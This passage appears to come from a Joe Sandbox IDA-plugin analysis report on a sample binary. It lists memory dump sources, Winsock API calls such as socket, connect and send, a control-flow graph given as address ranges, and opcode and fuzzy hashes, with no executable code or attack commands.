                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Startup
                                • String ID: if_nametoindex$iphlpapi.dll
                                • API String ID: 724789610-3097795196
                                • Opcode ID: 098262808002dbd50f3c9fa1b826ed13c267a83f4167fd03d5f758d21d154931
                                • Instruction ID: e264a8f1ad8b9fcb39b3b87c2f8b3e3dfdff3cc9e7099282c1bcacd9ebd24da1
                                • Opcode Fuzzy Hash: 098262808002dbd50f3c9fa1b826ed13c267a83f4167fd03d5f758d21d154931
                                • Instruction Fuzzy Hash: 6E0126E0944F8516FB11BB38AD1B76A35E06F65304F891868EC5CD31E2FB7CC988C252

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1783 29aa30-29aa64 1785 29aa6a-29aaa7 call 28e730 1783->1785 1786 29ab04-29ab09 1783->1786 1790 29aaa9-29aabd 1785->1790 1791 29ab0e-29ab13 1785->1791 1787 29ae80-29ae89 1786->1787 1792 29ab18-29ab50 1790->1792 1793 29aabf-29aac7 1790->1793 1794 29ae2e 1791->1794 1800 29ab58-29ab6d 1792->1800 1793->1794 1795 29aacd-29ab02 1793->1795 1796 29ae30-29ae4a call 28ea60 call 28ebf0 1794->1796 1795->1800 1808 29ae4c-29ae57 1796->1808 1809 29ae75-29ae7d 1796->1809 1802 29ab6f-29ab73 1800->1802 1803 29ab96-29abab socket 1800->1803 1802->1803 1806 29ab75-29ab8f 1802->1806 1803->1794 1805 29abb1-29abc5 1803->1805 1810 29abd0-29abed ioctlsocket 1805->1810 1811 29abc7-29abca 1805->1811 1806->1805 1824 29ab91 1806->1824 1812 29ae59-29ae5e 1808->1812 1813 29ae6e-29ae6f 1808->1813 1809->1787 1815 29abef-29ac0a 1810->1815 1816 29ac10-29ac14 1810->1816 1811->1810 1814 29ad2e-29ad39 1811->1814 1812->1813 1818 29ae60-29ae6c 1812->1818 1813->1809 1822 29ad3b-29ad4c 1814->1822 1823 29ad52-29ad56 1814->1823 1815->1816 1825 29ae29 1815->1825 1819 29ac37-29ac41 1816->1819 1820 29ac16-29ac31 1816->1820 1818->1809 1828 29ac7a-29ac7e 1819->1828 1829 29ac43-29ac46 1819->1829 1820->1819 1820->1825 1822->1823 1822->1825 1823->1825 1826 29ad5c-29ad6b 1823->1826 1824->1794 1825->1794 1834 29ad70-29ad78 1826->1834 1831 29ac80-29ac9b 1828->1831 1832 29ace7-29acfe 1828->1832 1836 29ac4c-29ac51 1829->1836 1837 29ad04-29ad08 1829->1837 1831->1832 1838 29ac9d-29acc1 1831->1838 1832->1837 1839 29ad7a-29ad7f 1834->1839 1840 29ada0-29adb2 connect 1834->1840 1836->1837 1842 29ac57-29ac78 1836->1842 1837->1814 1841 29ad0a-29ad28 1837->1841 1843 29acc6-29acd7 1838->1843 1839->1840 1844 29ad81-29ad99 1839->1844 1845 29adb3-29adcf 1840->1845 1841->1814 1841->1825 1842->1843 1843->1825 1851 29acdd-29ace5 1843->1851 1844->1845 1852 29ae8a-29ae91 1845->1852 1853 29add5-29add8 1845->1853 1851->1832 1851->1837 1852->1796 1854 29adda-29addf 1853->1854 1855 29ade1-29adf1 1853->1855 1854->1834 1854->1855 1856 29ae0d-29ae12 1855->1856 1857 29adf3-29ae07 1855->1857 1858 29ae1a-29ae1c call 29af70 1856->1858 1859 29ae14-29ae17 1856->1859 1857->1856 1862 29aea8-29aead 1857->1862 1863 29ae21-29ae23 1858->1863 1859->1858 1862->1796 1864 29ae93-29ae9d 1863->1864 1865 29ae25-29ae27 1863->1865 1866 29aeaf-29aeb1 call 28e760 1864->1866 1867 29ae9f-29aea6 call 28e7c0 1864->1867 1865->1796 1870 29aeb6-29aebe 1866->1870 1867->1870 1872 29af1a-29af1f 1870->1872 1873 29aec0-29aedb call 28e180 1870->1873 1872->1796 1873->1796 1876 29aee1-29aeec 1873->1876 1877 29aeee-29aeff 1876->1877 1878 29af02-29af06 1876->1878 1877->1878 1879 29af08-29af0b 1878->1879 1880 29af0e-29af15 1878->1880 1879->1880 1880->1787
                                APIs
                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0029AB9B
                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0029ABE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: ioctlsocketsocket
                                • String ID:
                                • API String ID: 416004797-0
                                • Opcode ID: 4ea77de4788ea6441d95f94b603c89c666eeec8ed27bceb8ee5b4f3d7ecc6a2f
                                • Instruction ID: c772db7ba9902d961ccb57481ca31b6b5f78567cbb3f2a2f7d87c37a7d8be1b8
                                • Opcode Fuzzy Hash: 4ea77de4788ea6441d95f94b603c89c666eeec8ed27bceb8ee5b4f3d7ecc6a2f
                                • Instruction Fuzzy Hash: 78E1E1706243029BEF20CF24C885B6BB7E5FF89304F144A2DF9998B291D775D864CB92
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID: FD %s:%d sclose(%d)
                                • API String ID: 2781271927-3116021458
                                • Opcode ID: 02de85c873a9fe6ce08d2eba429a9f83ccf3007be5f77925e9171deb7cf63cac
                                • Instruction ID: c5be1dd0c8508e4c05990c2938fcf78feef3cb9e2abb37ffbdb6e3d06a63f7c6
                                • Opcode Fuzzy Hash: 02de85c873a9fe6ce08d2eba429a9f83ccf3007be5f77925e9171deb7cf63cac
                                • Instruction Fuzzy Hash: 11D05E32A092216B8920655D6D49C4B6AA8DECAF60B46485AF948A7344E2209C0087E2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID: ]kw
                                • API String ID: 2962429428-3545051650
                                • Opcode ID: 6ab183cddbeea1f16001310119fa1faf1b5dd8a8d682a64ea1e3f1c30d506c56
                                • Instruction ID: ec80ca0c8ed48cfb30600b385bd784a0e3414db1f9a88e58f5380d30a670d9aa
                                • Opcode Fuzzy Hash: 6ab183cddbeea1f16001310119fa1faf1b5dd8a8d682a64ea1e3f1c30d506c56
                                • Instruction Fuzzy Hash: 3F3193B49057059BCB40FFB8D58569EBBF4BF44344F00896EE898A7341E7349A44CF92
                                APIs
                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0029B29E,?,00000000,?,?), ref: 0029B0B9
                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00283C41,00000000), ref: 0029B0C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: ErrorLastconnect
                                • String ID:
                                • API String ID: 374722065-0
                                • Opcode ID: 2fff33d58e9749efdb0666e84b070a41d3077d6a6b5f47bdd906810406db7e18
                                • Instruction ID: 8472901261978d05bd9102befab048eba5512724d740814650b3a78ede115d09
                                • Opcode Fuzzy Hash: 2fff33d58e9749efdb0666e84b070a41d3077d6a6b5f47bdd906810406db7e18
                                • Instruction Fuzzy Hash: 3F01D8322142015BCE215E69AD44F6BB399FF89764F040728F978931D1E726DD608751
                                APIs
                                • gethostname.WS2_32(00000000,00000040), ref: 00284AA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: gethostname
                                • String ID:
                                • API String ID: 144339138-0
                                • Opcode ID: 0f342616da04757bdea7282be3c95c4d0754758ed505a7f7f2ffc2a01f8f4cd1
                                • Instruction ID: 6c46474c6c981632b8f3e0e50ba12d31ad15c92fc3c0d4a3437afe77c0e791c6
                                • Opcode Fuzzy Hash: 0f342616da04757bdea7282be3c95c4d0754758ed505a7f7f2ffc2a01f8f4cd1
                                • Instruction Fuzzy Hash: 715106789227038BEB30BF25DD4972376D4AF00319F14093DE98A876D1E7B4E864CB02
                                APIs
                                • getsockname.WS2_32(?,?,00000080), ref: 0029AFD1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: getsockname
                                • String ID:
                                • API String ID: 3358416759-0
                                • Opcode ID: 4b96f7929bb1acc700bd659a4f8ceee5e4348de9f60115ac2493194ccd67a1c1
                                • Instruction ID: 9e44515baec107eef6dc1f210de59744a1749b86d36c95471ce3cdd7a0298048
                                • Opcode Fuzzy Hash: 4b96f7929bb1acc700bd659a4f8ceee5e4348de9f60115ac2493194ccd67a1c1
                                • Instruction Fuzzy Hash: 32119670818785D6EB268F1CD4027F6B3F4EFD0329F109618E59942550F7725AD58BC2
                                APIs
                                • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0029A97F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: 7a65d30e3c8c9f9254f53e0d7eba944957a6687a4eb65467acc91e39084358ea
                                • Instruction ID: 2520a3c0ebcf9354318b35b33e6facb9976235d0d3a288bfff8af0226ef564cd
                                • Opcode Fuzzy Hash: 7a65d30e3c8c9f9254f53e0d7eba944957a6687a4eb65467acc91e39084358ea
                                • Instruction Fuzzy Hash: 5901A2B2B10711AFD7148F19DC85B56B7A5FF84720F068659EA982B361C331AC108BE1
                                APIs
                                • socket.WS2_32(?,0029B280,00000000,-00000001,00000000,0029B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0029AF67
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: socket
                                • String ID:
                                • API String ID: 98920635-0
                                • Opcode ID: 9162f9816ee714db1343477e4ce2821aabd7b44b633be09583d57540512d47cc
                                • Instruction ID: 01785105766a99d3dc459d0d8af9d6180c89b199cf2ebff4da5983c9f31e6a38
                                • Opcode Fuzzy Hash: 9162f9816ee714db1343477e4ce2821aabd7b44b633be09583d57540512d47cc
                                • Instruction Fuzzy Hash: CEE0EDB6A193266BDA54DE1CE8449ABF369EFC4B20F055A49B85467204C330AC548BE2
                                APIs
                                • closesocket.WS2_32(?,00299422,?,?,?,?,?,?,?,?,?,?,?,w3(,00691280,00000000), ref: 0029B04D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: closesocket
                                • String ID:
                                • API String ID: 2781271927-0
                                • Opcode ID: c99d020bc1ca4abacd35d858171d7e9a801238dc56b029140c3d424904b72faf
                                • Instruction ID: 8ccdcae0318aa3bf5fa8a9a4f1a4c71783f09a447bd8c55c1af2ca2ff19f7f96
                                • Opcode Fuzzy Hash: c99d020bc1ca4abacd35d858171d7e9a801238dc56b029140c3d424904b72faf
                                • Instruction Fuzzy Hash: 32D0C23430020257CE208E14D984A57722B7FC0310FA8CB68E02C4A150D73BCC538601
                                APIs
                                • ioctlsocket.WS2_32(?,8004667E,?,?,0020AF56,?,00000001), ref: 002367FC
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
